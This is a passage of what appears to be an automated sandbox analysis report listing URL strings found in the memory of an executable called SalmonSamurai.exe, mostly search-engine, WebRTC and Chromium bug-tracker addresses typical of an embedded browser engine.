Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.icohttp://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/api/suggestOS?suggestQuery=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.icohttp://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-capture-time
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-send-time
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/generic-frame-descriptor-00
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/transport-wide-cc-02
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ac.search.naver.com/nx/ac?of=os&ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://aomediacodec.github.io/av1-rtp-spec/#dependency-descriptor-rtp-header-extension
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.oceanhero.today/suggestions?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.qwant.com/api/suggest/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/favicon.icohttps://ar.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/favicon.icohttps://at.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/favicon.icohttps://au.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/favicon.icohttps://br.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1178
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1178depth32float-stencil8Support
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1197
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1197shader-f16Supports
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1510
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1510rg11b10ufloat-renderableAllows
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1518
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1518bgra8unorm-storageAllows
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1591
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1591dawn-internal-usagesAdd
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=42
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=42texture-compression-etc2Support
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=434
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=551
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=551dawn-nativeWebGPU
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=690
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=690chromium-experimental-dp4aSupport
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=955
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=955texture-compression-astcSupport
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/tint/issues/detail?id=1497
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/tint/issues/detail?id=1497indirect-first-instanceSupport
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/favicon.icohttps://ca.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
